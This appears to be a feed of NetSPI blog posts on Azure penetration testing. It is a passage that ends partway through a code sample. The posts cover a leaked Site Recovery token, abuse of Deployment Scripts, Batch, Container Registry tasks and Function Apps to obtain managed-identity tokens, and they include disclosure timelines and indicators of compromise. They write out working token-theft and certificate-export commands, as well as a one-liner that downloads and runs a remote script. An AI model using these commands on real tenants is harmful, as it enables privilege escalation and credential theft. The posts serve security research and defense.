Cloud Penetration Testing - NetSPI https://www.netspi.com/blog/technical/cloud-penetration-testing/ Trusted by nine of the top 10 U.S. Banks Wed, 27 Mar 2024 16:55:14 +0000 en-US hourly 1 https://wordpress.org/?v=6.5 Elevating Privileges with Azure Site Recovery Services https://www.netspi.com/blog/technical/cloud-penetration-testing/elevating-privileges-with-azure-site-recovery-services/ Thu, 28 Mar 2024 13:00:00 +0000 https://www.netspi.com/?p=32170 Discover how NetSPI uncovered and reported a Microsoft-managed Azure Site Recovery service vulnerability and how the finding was remediated.

The post Elevating Privileges with Azure Site Recovery Services appeared first on NetSPI.

]]>
Cleartext credentials are commonly targeted in a penetration test and used to move laterally to other systems, obtain sensitive information, or even further elevate privileges. While this is a low effort finding to exploit, threat actors will utilize cleartext credentials to conduct attacks that could have a high impact for the target environment.

NetSPI discovered a cleartext Azure Access Token for a privileged Managed Identity. This prompted further investigation in which we were able to determine that the vulnerability was caused by the Microsoft-managed Azure Site Recovery service. In this blog, we’ll share the technical details around how we found and reported this vulnerability to Microsoft. Additionally, we’ll cover how the finding was remediated.

TL;DR

  1. The Azure Site Recovery (ASR) service utilizes an Automation Account with a System-Assigned Managed Identity to manage Site Recovery extensions on the enrolled Virtual Machines
  2. The ASR created Automation Account executes a Runbook that is hidden from the user, but the corresponding Job output for the Runbook remains visible
  3. A cleartext Management-scoped Access Token for the System-Assigned Managed Identity, which has the Contributor role over the entire subscription, was disclosed in the Job output and could be used to authenticate as the Managed Identity
  4. A lower-privileged user role could read this Access Token and authenticate as the Managed Identity, elevating their privileges to a Contributor over the entire subscription
  5. Microsoft has remediated this vulnerability for new and existing Azure Site Recovery deployments as of 02/13/2024

Background

The Azure Site Recovery (ASR) service is used to replicate enrolled Azure resources across different regions as a way to deploy replication or failover processes to maintain accessibility during an unplanned outage.

Requirements

The Azure Site Recovery service is not enabled by default. The Azure subscription was vulnerable to this privilege escalation path when:

  1. A Recovery Service Vault was created
  2. Site Recovery was enabled with enrolled Virtual Machines from a different region
  3. Extension Update Settings are turned on

It should be noted that the Azure Site Recovery service needs to be initially configured and the Extension Update Settings enabled by an Owner of the subscription. This is due to the fact that the service attaches the Contributor role to the Managed Identity that is created for the attached Automation Account.

Discovering the Vulnerability

The Extension Update Setting (when enabled) creates a new Automation Account in the Subscription, in this case “blogASR-c99-asr-automationaccount”, which is used to manage the Site Recovery extensions on the enrolled Virtual Machines.

Azure-Site-Discovery_1

The Automation Account periodically executes a Runbook to ensure the Site Recovery extensions are updated on the enrolled Virtual Machines. This Runbook is hidden from the end user since it’s created by the managed service (ASR).

We were able to determine the name of the Runbook as it is accessible in the JSON view for the Job.

Although the Runbook is hidden from the end user, the Job output remains visible under the Automation Account’s “Jobs” tab.

The Jobs will appear as MS-SR-Update-MobilityServiceForA2AVirtualMachines or MS-ASR-Modify-AutoUpdateForA2AVirtualMachines. Both Jobs contained output with a cleartext Access Token being truncated.

The Job output also shows that the authentication type is for the System Assigned Managed Identity. We discovered that this System-Assigned Managed Identity also gets created with the Automation Account.

Searching the Object ID in Entra reveals the “blogASR-c99-asr-automationaccount” Enterprise Application.

The assigned role can be viewed in the subscription’s Access Controls (IAM). Notice that the Contributor role is granted to the application over the entire subscription.

Elevating Privileges to the System Assigned Managed Identity

The */read or Microsoft.Automation/automationAccounts/jobs/output/read permissions are required to be able to read the Job output. Depending on the scope, this means lower-privileged user roles such as Reader or Log Analytics Reader (and even more obscure roles like Managed Applications Reader) can view the Access Token to elevate privileges!

A clear escalation path has now been identified with any lower-privileged user role able to view the Job output and see the cleartext Access Token, but how can we retrieve the full Access Token that is being truncated in the Portal view? To demonstrate the escalation path, we used a lower-privileged user (blogReader) with the Reader role.

We can use the Az PowerShell module with the low-privileged user (blogReader) to retrieve the Job output and view the full access token. We simply need to supply the name of the Automation Account, the Job ID, and the Resource Group for the Automation Account. Notice that the Epoch timestamp shows the token will be valid for 24 hours after its creation.

PS > Get-AzContext | FL
Name               : [REDACTED] - blogReader
Account            : blogReader
Environment        : AzureCloud
Subscription       : [REDACTED]
Tenant             : [REDACTED]
PS > Get-AzAutomationJobOutput -AutomationAccountName " blogASR-c99-asr-automationaccount" -Id 39814559-5661-4de3-857b-bb2504c4fcd6 -ResourceGroupName "blogRG2" -Stream "Any" | Get-AzAutomationJobOutputRecord
[TRUNCATED]
Value: {[expires_on, 1704853521], [resource, https://management.core.windows.net/], [token_type, Bearer], [access_token, eyJ0eXAi[REDACTED]]}
[TRUNCATED]

With the Access Token and Enterprise Application ID, the low-privileged user (blogReader) can authenticate as the System-Assigned Managed Identity which has the Contributor role on the entire subscription:

PS > $accesstoken = "eyJ0eXAi[REDACTED]"
PS > Connect-AzAccount -AccessToken $accesstoken -AccountId ee7f506d-65d4-492f-acb1-0ddb8e0d29cd
Account Environment   SubscriptionName    TenantId
-------------------   ----------------    -----------
[REDACTED]            [REDACTED]          [REDACTED]

We used the Az PowerShell module to verify the credentials are valid and have the context of a Contributor:

PS > $token = ((Get-AzAccessToken).Token).Split(".")[1].Replace('-', '+').Replace('_', '/')
PS > while ($token.Length % 4) {$token += "="}
PS > # Base64 Decode, convert from json, extract OID, pass into filter for Get-AzRoleAssignment to find current roles
PS > Get-AzRoleAssignment | where ObjectId -EQ ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($token)) | ConvertFrom-Json).oid
RoleAssignmentName : 721d0fc1-9571-587a-ac51-f71f70b79310
RoleAssignmentId   : /subscriptions/[REDACTED]/providers/Microsoft.Authorization/roleAssignments/721d0fc1-9571-587a-ac51-f71f70b79310
Scope              : /subscriptions/[REDACTED]
DisplayName        :
SignInName         :
RoleDefinitionName : Contributor
RoleDefinitionId   : b24988ac-6180-42a0-ab88-20f7382dd24c
ObjectId           : cd459283-0d93-47fd-a614-c9280b2634ef
[TRUNACTED]

Potential Impact

Elevating privileges to the Contributor role over the subscription has a high impact for Azure users. Depending on the environment, this vulnerability allows for further elevation within a subscription.

For instance, the Contributor role provides administrative access over Virtual Machines which would allow an attacker to execute “Run Commands” as “NT Authority\SYSTEM”. In cases where Domain Controllers are present in the subscription, this elevation path allows an attacker to compromise the joined Active Directory environment as a Domain Administrator.

PS > Invoke-AzVMRunCommand -ResourceGroupName 'blogRG1' -VMName 'blogDC' -CommandId 'RunPowerShellScript' -ScriptPath 'whoami.ps1'
Value[0]        :
  Code          : ComponentStatus/StdOut/succeeded
  Level         : Info
  DisplayStatus : Provisioning succeeded
  Message       : nt authority\system
[TRUNCATED]

Another example, previously outlined by Karl Fosaaen in the NetSPI blog, is abusing access to Cloud Shell images in Storage Accounts. Contributors have read/write access to Cloud Shell images in which they can inject the image with malicious commands and upload the modified image which will execute those commands in the context of that user.

While these circumstances may not be present in every environment, it’s important to understand the impact that this vulnerability can have when it’s abused by an attacker.

Remediation

Microsoft remediated this vulnerability by removing the Access Token from the Automation Account’s Job output.

MSRC Disclosure Timeline

  • 01/09/2024 – The initial report was submitted to MSRC
  • 01/09/2024 – MSRC assigns a case number 84800
  • 01/18/2024 – MRCS confirms the vulnerability
  • 02/13/2024 – MSRC pushes a fix for the vulnerability
  • 02/22/2024 – NetSPI verifies the vulnerability has been remediated for new and existing Azure Site Recovery deployments

Special thanks goes out to NetSPI’s Karl Fosaaen and Thomas Elling for contributing to the research for this vulnerability.

For more information on Cloud Pentesting, check out these resources below:

The post Elevating Privileges with Azure Site Recovery Services appeared first on NetSPI.

]]>
Azure Deployment Scripts: Assuming User-Assigned Managed Identities https://www.netspi.com/blog/technical/cloud-penetration-testing/azure-user-assigned-managed-identities-via-deployment-scripts/ Thu, 14 Mar 2024 13:00:00 +0000 https://www.netspi.com/?p=32110 Learn how to use Deployment Scripts to complete faster privilege escalation with Azure User-Assigned Managed Identities.

The post Azure Deployment Scripts: Assuming User-Assigned Managed Identities appeared first on NetSPI.

]]>
As Azure penetration testers, we often run into overly permissioned User-Assigned Managed Identities. This type of Managed Identity is a subscription level resource that can be applied to multiple other Azure resources. Once applied to another resource, it allows the resource to utilize the associated Entra ID identity to authenticate and gain access to other Azure resources. These are typically used in cases where Azure engineers want to easily share specific permissions with multiple Azure resources. An attacker, with the correct permissions in a subscription, can assign these identities to resources that they control, and can get access to the permissions of the identity. 

When we attempt to escalate our permissions with an available User-Assigned Managed Identity, we can typically choose from one of the following services to attach the identity to:

Once we attach the identity to the resource, we can then use that service to generate a token (to use with Microsoft APIs) or take actions as that identity within the service. We’ve linked out on the above list to some blogs that show how to use those services to attack Managed Identities. 

The last item on that list (Deployment Scripts) is a more recent addition (2023). After taking a look at Rogier Dijkman’s post – “Project Miaow (Privilege Escalation from an ARM template)” – we started making more use of the Deployment Scripts as a method for “borrowing” User-Assigned Managed Identities. We will use this post to expand on Rogier’s blog and show a new MicroBurst function that automates this attack.

TL;DR 

  • Attackers may get access to a role that allows assigning a Managed Identity to a resource 
  • Deployment Scripts allow attackers to attach a User-Assigned Managed Identity 
  • The Managed Identity can be used (via Az PowerShell or AZ CLI) to take actions in the Deployment Scripts container 
  • Depending on the permissions of the Managed Identity, this can be used for privilege escalation 
  • We wrote a tool to automate this process 

What are Deployment Scripts? 

As an alternative to running local scripts for configuring deployed Azure resources, the Azure Deployment Scripts service allows users to run code in a containerized Azure environment. The containers themselves are created as “Container Instances” resources in the Subscription and are linked to the Deployment Script resources. There is also a supporting “*azscripts” Storage Account that gets created for the storage of the Deployment Script file resources. This service can be a convenient way to create more complex resource deployments in a subscription, while keeping everything contained in one ARM template.

In Rogier’s blog, he shows how an attacker with minimal permissions can abuse their Deployment Script permissions to attach a Managed Identity (with the Owner Role) and promote their own user to Owner. During an Azure penetration test, we don’t often need to follow that exact scenario. In many cases, we just need to get a token for the Managed Identity to temporarily use with the various Microsoft APIs.

Automating the Process

In situations where we have escalated to some level of “write” permissions in Azure, we usually want to do a review of available Managed Identities that we can use, and the roles attached to those identities. This process technically applies to both System-Assigned and User-Assigned Managed Identities, but we will be focusing on User-Assigned for this post.

Link to the Script – https://github.com/NetSPI/MicroBurst/blob/master/Az/Invoke-AzUADeploymentScript.ps1

This is a pretty simple process for User-Assigned Managed Identities. We can use the following one-liner to enumerate all of the roles applied to a User-Assigned Managed Identity in a subscription:

Get-AzUserAssignedIdentity | ForEach-Object { Get-AzRoleAssignment -ObjectId $_.PrincipalId }

Keep in mind that the Get-AzRoleAssignment call listed above will only get the role assignments that your authenticated user can read. There is potential that a Managed Identity has permissions in other subscriptions that you don’t have access to. The Invoke-AzUADeploymentScript function will attempt to enumerate all available roles assigned to the identities that you have access to, but keep in mind that the identity may have roles in Subscriptions (or Management Groups) that you don’t have read permissions on.

Once we have an identity to target, we can assign it to a resource (a Deployment Script) and generate tokens for the identity. Below is an overview of how we automate this process in the Invoke-AzUADeploymentScript function:

  • Enumerate available User-Assigned Managed Identities and their role assignments
  • Select the identity to target
  • Generate the malicious Deployment Script ARM template
  • Create a randomly named Deployment Script with the template
  • Get the output from the Deployment Script
  • Remove the Deployment Script and Resource Group Deployment

Since we don’t have an easy way of determining if your current user can create a Deployment Script in a given Resource Group, the script assumes that you have Contributor (Write permissions) on the Resource Group containing the User-Assigned Managed Identity, and will use that Resource Group for the Deployment Script.

If you want to deploy your Deployment Script to a different Resource Group in the same Subscription, you can use the “-ResourceGroup” parameter. If you want to deploy your Deployment Script to a different Subscription in the same Tenant, use the “-DeploymentSubscriptionID” parameter and the “-ResourceGroup” parameter.

Finally, you can specify the scope of the tokens being generated by the function with the “-TokenScope” parameter.

Example Usage:

We have three different use cases for the function:

  1. Deploy to the Resource Group containing the target User-Assigned Managed Identity
Invoke-AzUADeploymentScript -Verbose
  1. Deploy to a different Resource Group in the same Subscription
Invoke-AzUADeploymentScript -Verbose -ResourceGroup "ExampleRG"
  1. Deploy to a Resource Group in a different Subscription in the same tenant
Invoke-AzUADeploymentScript -Verbose -ResourceGroup "OtherExampleRG" -DeploymentSubscriptionID "00000000-0000-0000-0000-000000000000"

*Where “00000000-0000-0000-0000-000000000000” is the Subscription ID that you want to deploy to, and “OtherExampleRG” is the Resource Group in that Subscription.

Additional Use Cases

Outside of the default action of generating temporary Managed Identity tokens, the function allows you to take advantage of the container environment to take actions with the Managed Identity from a (generally) trusted space. You can run specific commands as the Managed Identity using the “-Command” flag on the function. This is nice for obfuscating the source of your actions, as the usage of the Managed Identity will track back to the Deployment Script, versus using generated tokens away from the container.

Below are a couple of potential use cases and commands to use:

  • Run commands on VMs
  • Create RBAC Role Assignments
  • Dump Key Vaults, Storage Account Keys, etc.

Since the function expects string data as the output from the Deployment Script, make sure that you format your “-command” output in the parameter to ensure that your command output is returned.

Example:

Invoke-AzUADeploymentScript -Verbose -Command "Get-AzResource | ConvertTo-Json”

Lastly, if you’re running any particularly complex commands, then you may be better off loading in your PowerShell code from an external source as your “–Command” parameter. Using the Invoke-Expression (IEX) function in PowerShell is a handy way to do this.

Example:

IEX(New-Object System.Net.WebClient).DownloadString(‘https://example.com/DeploymentExec.ps1’) |  Out-String

Indicators of Compromise (IoCs)

We’ve included the primary IoCs that defenders can use to identify these attacks. These are listed in the expected chronological order for the attack.

Operation NameDescription
Microsoft.Resources/deployments/validate/actionValidate Deployment
Microsoft.Resources/deployments/writeCreate Deployment
Microsoft.Resources/deploymentScripts/writeWrite Deployment Script
Microsoft.Storage/storageAccounts/writeCreate/Update Storage Account
Microsoft.Storage/storageAccounts/listKeys/actionList Storage Account Keys
Microsoft.ContainerInstance/containerGroups/writeCreate/Update Container Group
Microsoft.Resources/deploymentScripts/deleteDelete Deployment Script
Microsoft.Resources/deployments/deleteDelete Deployment

It’s important to note the final “delete” items on the list, as the function does clean up after itself and should not leave behind any resources.

Conclusion

While Deployment Scripts and User-Assigned Managed Identities are convenient for deploying resources in Azure, administrators of an Azure subscription need to keep a close eye on the permissions granted to users and Managed Identities. A slightly over-permissioned user with access to a significantly over-permissioned Managed Identity is a recipe for a fast privilege escalation.

References:

The post Azure Deployment Scripts: Assuming User-Assigned Managed Identities appeared first on NetSPI.

]]>
Extracting Sensitive Information from the Azure Batch Service  https://www.netspi.com/blog/technical/cloud-penetration-testing/extracting-sensitive-information-from-azure-batch-service/ Wed, 28 Feb 2024 16:41:24 +0000 https://www.netspi.com/?p=31943 The added power and scalability of Batch Service helps users run workloads significantly faster, but misconfigurations can unintentionally expose sensitive data.

The post Extracting Sensitive Information from the Azure Batch Service  appeared first on NetSPI.

]]>
We’ve recently seen an increased adoption of the Azure Batch service in customer subscriptions. As part of this, we’ve taken some time to dive into each component of the Batch service to help identify any potential areas for misconfigurations and sensitive data exposure. This research time has given us a few key areas to look at in the Azure Batch service, that we will cover in this blog. 

TL;DR

  • Azure Batch allows for scalable compute job execution
    • Think large data sets and High Performance Computing (HPC) applications 
  • Attackers with Reader access to Batch can: 
    • Read sensitive data from job outputs 
    • Gain access to SAS tokens for Storage Account files attached to the jobs 
  • Attackers with Contributor access can: 
    • Run jobs on the batch pool nodes 
    • Generate Managed Identity tokens 
    • Gather Batch Access Keys for job execution persistence 

The Azure Batch service functions as a middle ground between Azure Automation Accounts and a full deployment of an individual Virtual Machine to run compute jobs in Azure. This in-between space allows users of the service to spin up pools that have the necessary resource power, without the overhead of creating and managing a dedicated virtual system. This scalable service is well suited for high performance computing (HPC) applications, and easily integrates with the Storage Account service to support processing of large data sets. 

While there is a bit of a learning curve for getting code to run in the Batch service, the added power and scalability of the service can help users run workloads significantly faster than some of the similar Azure services. But as with any Azure service, misconfigurations (or issues with the service itself) can unintentionally expose sensitive information.

Service Background – Pools 

The Batch service relies on “Pools” of worker nodes. When the pools are created, there are multiple components you can configure that the worker nodes will inherit. Some important ones are highlighted here: 

  • User-Assigned Managed Identity 
    • Can be shared across the pool to allow workers to act as a specific Managed Identity 
  • Mount configuration 
    • Using a Storage Account Key or SAS token, you can add data storage mounts to the pool 
  • Application packages 
    • These are applications/executables that you can make available to the pool 
  • Certificates 
    • This is a feature that will be deprecated in 2024, but it could be used to make certificates available to the pool, including App Registration credentials 

The last pool configuration item that we will cover is the “Start Task” configuration. The Start Task is used to set up the nodes in the pool, as they’re spun up.

The “Resource files” for the pool allow you to select blobs or containers to make available for the “Start Task”. The nice thing about the option is that it will generate the Storage Account SAS tokens for you.

While Contributor permissions are required to generate those SAS tokens, the tokens will get exposed to anyone with Reader permissions on the Batch account.

We have reported this issue to MSRC (see disclosure timeline below), as it’s an information disclosure issue, but this is considered expected application behavior. These SAS tokens are configured with Read and List permissions for the container, so an attacker with access to the SAS URL would have the ability to read all of the files in the Storage Account Container. The default window for these tokens is 7 days, so the window is slightly limited, but we have seen tokens configured with longer expiration times.

The last item that we will cover for the pool start task is the “Environment settings”. It’s not uncommon for us to see sensitive information passed into cloud services (regardless of the provider) via environmental variables. Your mileage may vary with each Batch account that you look at, but we’ve had good luck with finding sensitive information in these variables.

Service Background – Jobs

Once a pool has been configured, it can have jobs assigned to it. Each job has tasks that can be assigned to it. From a practical perspective, you can think of tasks as the same as the pool start tasks. They share many of the same configuration settings, but they just define the task level execution, versus the pool level. There are differences in how each one is functionally used, but from a security perspective, we’re looking at the same configuration items (Resource Files, Environment Settings, etc.). 

Generating Managed Identity Tokens from Batch

With Contributor rights on the Batch service, we can create new (or modify existing) pools, jobs, and tasks. By modifying existing configurations, we can make use of the already assigned Managed Identities. 

If there’s a User Assigned Managed Identity that you’d like to generate tokens for, that isn’t already used in Batch, your best bet is to create a new pool. Keep in mind that pool creation can be a little difficult. When we started investigating the service, we had to request a pool quota increase just to start using the service. So, keep that in mind if you’re thinking about creating a new pool.

To generate Managed Identity Tokens with the Jobs functionality, we will need to create new tasks to run under a job. Jobs need to be in an “Active” state to add a new task to an existing job. Jobs that have already completed won’t let you add new tasks.

In any case, you will need to make a call to the IMDS service, much like you would for a typical Virtual Machine, or a VM Scale Set Node.

(Invoke-WebRequest -Uri ‘http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/’ -Method GET -Headers @{Metadata=”true”} -UseBasicParsing).Content

To make Managed Identity token generation easier, we’ve included some helpful shortcuts in the MicroBurst repository – https://github.com/NetSPI/MicroBurst/tree/master/Misc/Shortcuts

If you’re new to escalating with Managed Identities in Azure, here are a few posts that will be helpful:

Alternatively, you may also be able to directly access the nodes in the pool via RDP or SSH. This can be done by navigating the Batch resource menus into the individual nodes (Batch Account -> Pools -> Nodes -> Name of the Node -> Connect). From here, you can generate credentials for a local user account on the node (or use an existing user) and connect to the node via SSH or RDP.

Once you’ve authenticated to the node, you will have full access to generate tokens and access files on the host.

Exporting Certificates from Batch Nodes

While this part of the service is being deprecated (February 29, 2024), we thought it would be good to highlight how an attacker might be able to extract certificates from existing node pools. It’s unclear how long those certificates will stick around after they’ve been deprecated, so your mileage may vary.

If there are certificates configured for the Pool, you can review them in the pool settings.

Once you have the certificate locations identified (either CurrentUser or LocalMachine), appropriately modify and use the following commands to export the certificates to Base64 data. You can run these commands via tasks, or by directly accessing the nodes.

$mypwd = ConvertTo-SecureString -String "TotallyNotaHardcodedPassword..." -Force -AsPlainText
Get-ChildItem -Path cert:\currentUser\my\| ForEach-Object{ 
    try{ Export-PfxCertificate -cert $_.PSPath -FilePath (-join($_.PSChildName,'.pfx')) -Password $mypwd | Out-Null
    [Convert]::ToBase64String([IO.File]::ReadAllBytes((-join($PWD,'\',$_.PSChildName,'.pfx'))))
    remove-item (-join($PWD,'\',$_.PSChildName,'.pfx'))
    }
    catch{}
}

Once you have the Base64 versions of the certificates, set the $b64 variable to the certificate data and use the following PowerShell code to write the file to disk.

$b64 = “MII…[Your Base64 Certificate Data]”
[IO.File]::WriteAllBytes("$PWD\testCertificate.pfx",[Convert]::FromBase64String($b64))

Note that the PFX certificate uses “TotallyNotaHardcodedPassword…” as a password. You can change the password in the first line of the extraction code.

Automating Information Gathering

Since we are most commonly assessing an Azure environment with the Reader role, we wanted to automate the collection of a few key Batch account configuration items. To support this, we created the “Get-AzBatchAccountData” function in MicroBurst.

The function collects the following information:

  • Pools Data
    • Environment Variables
  • Start Task Commands
    • Available Storage Container URLs
  • Jobs Data
    • Environment Variables
    • Tasks (Job Preparation, Job Manager, and Job Release)
    • Jobs Sub-Tasks
    • Available Storage Container URLs
  • With Contributor Level Access
    • Primary and Secondary Keys for Triggering Jobs

While I’m not a big fan of writing output to disk, this was the cleanest way to capture all of the data coming out of available Batch accounts.

Tool Usage:

Authenticate to the Az PowerShell module (Connect-AzAccount), import the “Get-AzBatchAccountData.ps1” function from the MicroBurst Repo, and run the following command:

PS C:\> Get-AzBatchAccountData -folder BatchOutput -Verbose
VERBOSE: Logged In as kfosaaen@example.com
VERBOSE: Dumping Batch Accounts from the "Sample Subscription" Subscription
VERBOSE: 	1 Batch Account(s) Enumerated
VERBOSE: 		Attempting to dump data from the testspi account
VERBOSE: 			Attempting to dump keys
VERBOSE: 			1 Pool(s) Enumerated
VERBOSE: 				Attempting to dump pool data
VERBOSE: 			13 Job(s) Enumerated
VERBOSE: 				Attempting to dump job data
VERBOSE: 		Completed dumping of the testspi account

This should create an output folder (BatchOutput) with your output files (Jobs, Keys, Pools). Depending on your permissions, you may not be able to dump the keys.

Conclusion

As part of this research, we reached out to MSRC on the exposure of the Container Read/List SAS tokens. The issue was initially submitted in June of 2023 as an information disclosure issue. Given the low priority of the issue, we followed up in October of 2023. We received the following email from MSRC on October 27th, 2023:

We determined that this behavior is considered to be ‘by design’. Please find the notes below.

Analysis Notes: This behavior is as per design. Azure Batch API allows for the user to provide a set of urls to storage blobs as part of the API. Those urls can either be public storage urls, SAS urls or generated using managed identity. None of these values in the API are treated as “private”. If a user has permissions to a Batch account then they can view these values and it does not pose a security concern that requires servicing.

In general, we’re not seeing a massive adoption of Batch accounts in Azure, but we are running into them more frequently and we’re finding interesting information. This does seem to be a powerful Azure service, and (potentially) a great one to utilize for escalations in Azure environments.

References:

The post Extracting Sensitive Information from the Azure Batch Service  appeared first on NetSPI.

]]>
Automating Managed Identity Token Extraction in Azure Container Registries https://www.netspi.com/blog/technical/cloud-penetration-testing/automating-managed-identity-token-extraction-in-azure-container-registries/ Thu, 04 Jan 2024 15:00:00 +0000 https://www.netspi.com/?p=31693 Learn the processes used to create a malicious Azure Container Registry task that can be used to export tokens for Managed Identities attached to an ACR.

The post Automating Managed Identity Token Extraction in Azure Container Registries appeared first on NetSPI.

]]>
In the ever-evolving landscape of containerized applications, Azure Container Registry (ACR) is one of the more commonly used services in Azure for the management and deployment of container images. ACR not only serves as a secure and scalable repository for Docker images, but also offers a suite of powerful features to streamline management of the container lifecycle. One of those features is the ability to run build and configuration scripts through the “Tasks” functionality.  

This functionality does have some downsides, as it can be abused by attackers to generate tokens for any Managed Identities that are attached to the ACR. In this blog post, we will show the processes used to create a malicious ACR task that can be used to export tokens for Managed Identities attached to an ACR. We will also show a new tool within MicroBurst that can automate this whole process for you. 

TL;DR 

  • Azure Container Registries (ACRs) can have attached Managed Identities 
  • Attackers can create malicious tasks in the ACR that generate and export tokens for the Managed Identities 
  • We’ve created a tool in MicroBurst (Invoke-AzACRTokenGenerator) that automates this attack path 

Previous Research 

To be fully transparent, this blog and tooling was a result of trying to replicate some prior research from Andy Robbins (Abusing Azure Container Registry Tasks) that was well documented, but lacked copy and paste-able commands that I could use to recreate the attack. While the original blog focuses on overwriting existing tasks, we will be focusing on creating new tasks and automating the whole process with PowerShell. A big thank you to Andy for the original research, and I hope this tooling helps others replicate the attack.

Attack Process Overview 

Here is the general attack flow that we will be following: 

  1. The attacker has Contributor (Write) access on the ACR 
  • Technically, you could also poison existing ACR task files in a GitHub repo, but the previous research (noted above) does a great job of explaining that issue 
  1. The attacker creates a malicious YAML task file  
  • The task authenticates to the Az CLI as the Managed Identity, then generates a token 
  1. A Task is created with the AZ CLI and the YAML file 
  2. The Task is run in the ACR Task container 
  3. The token is written to the Task output, then retrieved by the attacker 

If you want to replicate the attack using the AZ CLI, use the following steps:

  1. Authenticate to the AZ CLI (AZ Login) with an account with the Contributor role on the ACR
  2. Identify the available Container Registries with the following command:
az acr list
  1. Write the following YAML to a local file (.\taskfile) 
version: v1.1.0 
steps: 
  - cmd: az login --identity --allow-no-subscriptions 
  - cmd: az account get-access-token 
  1. Note that this assumes you are using a System Assigned Managed Identity, if you’re using a User-Assigned Managed Identity, you will need to add a “–username <client_id|object_id|resource_id>” to the login command 
  2. Create the task in the ACR ($ACRName) with the following command 
az acr task create --registry $ACRName --name sample_acr_task --file .\taskfile --context /dev/null --only-show-errors --assign-identity [system] 
  1. If you’re using a User-Assigned Managed Identity, replace [system] with the resource path (“/subscriptions/<subscriptionId>/resourcegroups/<myResourceGroup>/providers/
    Microsoft.ManagedIdentity/userAssignedIdentities/<myUserAssignedIdentitiy>”) for the identity you want to use 
  2. Use the following command to run the command in the ACR 
az acr task run -n sample_acr_task -r $acrName 
  1. The task output, including the token, should be displayed in the output for the run command. 
  2. Next, we will want to delete the task with the following command 
az acr task delete -n sample_acr_task -r $acrName -y 

Please note that while the task may be deleted, the “Runs” of the task will still show up in the ACR. Since Managed Identity tokens have a limited shelf-life, this isn’t a huge concern, but it would expose the token to anyone with the Reader role on the ACR. If you are concerned about this, feel free to modify the task definition to use another method (HTTP POST) to exfiltrate the token. 

Automating Managed Identity Token Extraction in Azure Container Registries

Invoke-AzACRTokenGenerator Usage/overview 

To automate this process, we added the Invoke-AzACRTokenGenerator function to the MicroBurst toolkit. The function follows the above methodology and uses a mix of the Az PowerShell module cmdlets and REST API calls to replace the AZ CLI commands.  

A couple of things to note: 

  • The function will prompt (via Out-GridView) you for a Subscription to use and for the ACRs that you want to target 
    • Keep in mind that you can multi-select (Ctrl+click) Subscriptions and ACRs to help exploit multiple targets at once 
  • By default, the function generates tokens for the “Management” (https://management.azure.com/) service 
    • If you want to specify a different scope endpoint, you can do so with the -TokenScope parameter. 
    • Two commonly used options: 
  1. https://graph.microsoft.com/ – Used for accessing the Graph API
  2. https://vault.azure.net – Used for accessing the Key Vault API 
  • The Output is a Data Table Object that can be assigned to a variable  
    • $tokens = Invoke-AzACRTokenGenerator 
    • This can also be appended with a “+=” to add tokens to the object 
  1. This is handy for storing multiple token scopes (Management, Graph, Vault) in one object 

This command will be imported with the rest of the MicroBurst module, but you can use the following command to manually import the function into your PowerShell session: 

Import-Module .\MicroBurst\Az\Invoke-AzACRTokenGenerator.ps1 

Once imported, the function is simple to use: 

Invoke-AzACRTokenGenerator -Verbose 

Example Output:

Automating Managed Identity Token Extraction in Azure Container Registries

Indicators of Compromise (IoCs) 

To better support the defenders out there, we’ve included some IoCs that you can look for in your Azure activity logs to help identify this kind of attack. 

Operation Name Description 
Microsoft.ContainerRegistry/registries/tasks/write Create or update a task for a container registry. 
Microsoft.ContainerRegistry/registries/scheduleRun/action Schedule a run against a container registry. 
Microsoft.ContainerRegistry/registries/runs/listLogSasUrl/actionGet the log SAS URL for a run. 
Microsoft.ContainerRegistry/registries/tasks/delete Delete a task for a container registry.

Conclusion 

The Azure ACR tasks functionality is very helpful for automating the lifecycle of a container, but permissions misconfigurations can allow attackers to abuse attached Managed Identities to move laterally and escalate privileges.  

If you’re currently using Azure Container Registries, make sure you review the permissions assigned to the ACRs, along with any permissions assigned to attached Managed Identities. It would also be worthwhile to review permissions on any tasks that you have stored in GitHub, as those could be vulnerable to poisoning attacks. Finally, defenders should look at existing task files to see if there are any malicious tasks, and make sure that you monitor the actions that we noted above. 

The post Automating Managed Identity Token Extraction in Azure Container Registries appeared first on NetSPI.

]]>
Mistaken Identity: Extracting Managed Identity Credentials from Azure Function Apps  https://www.netspi.com/blog/technical/cloud-penetration-testing/mistaken-identity-azure-function-apps/ Thu, 16 Nov 2023 15:00:00 +0000 https://www.netspi.com/?p=31440 NetSPI explores extracting managed identity credentials from Azure Function Apps to expose sensitive data.

The post Mistaken Identity: Extracting Managed Identity Credentials from Azure Function Apps  appeared first on NetSPI.

]]>
As we were preparing our slides and tools for our DEF CON Cloud Village Talk (What the Function: A Deep Dive into Azure Function App Security), Thomas Elling and I stumbled onto an extension of some existing research that we disclosed on the NetSPI blog in March of 2023. We had started working on a function that could be added to a Linux container-based Function App to decrypt the container startup context that is passed to the container on startup. As we got further into building the function, we found that the decrypted startup context disclosed more information than we had previously realized. 

TL;DR 

  1. The Linux containers in Azure Function Apps utilize an encrypted start up context file hosted in Azure Storage Accounts
  2. The Storage Account URL and the decryption key are stored in the container environmental variables and are available to anyone with the ability to execute commands in the container
  3. This startup context can be decrypted to expose sensitive data about the Function App, including the certificates for any attached Managed Identities, allowing an attacker to gain persistence as the Managed Identity. As of the November 11, 2023, this issue has been fully addressed by Microsoft. 

In the earlier blog post, we utilized an undocumented Azure Management API (as the Azure RBAC Reader role) to complete a directory traversal attack to gain access to the proc file system files. This allowed access to the environmental variables (/proc/self/environ) used by the container. These environmental variables (CONTAINER_ENCRYPTION_KEY and CONTAINER_START_CONTEXT_SAS_URI) could then be used to decrypt the startup context of the container, which included the Function App keys. These keys could then be used to overwrite the existing Function App Functions and gain code execution in the container. At the time of the previous research, we had not investigated the impact of having a Managed Identity attached to the Function App. 

As part of the DEF CON Cloud Village presentation preparation, we wanted to provide code for an Azure function that would automate the decryption of this startup context in the Linux container. This could be used as a shortcut for getting access to the function keys in cases where someone has gained command execution in a Linux Function App container, or gained Storage Account access to the supporting code hosting file shares.  

Here is the PowerShell sample code that we started with:

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

$encryptedContext = (Invoke-RestMethod $env:CONTAINER_START_CONTEXT_SAS_URI).encryptedContext.split(".") 

$key = [System.Convert]::FromBase64String($env:CONTAINER_ENCRYPTION_KEY) 
$iv = [System.Convert]::FromBase64String($encryptedContext[0]) 
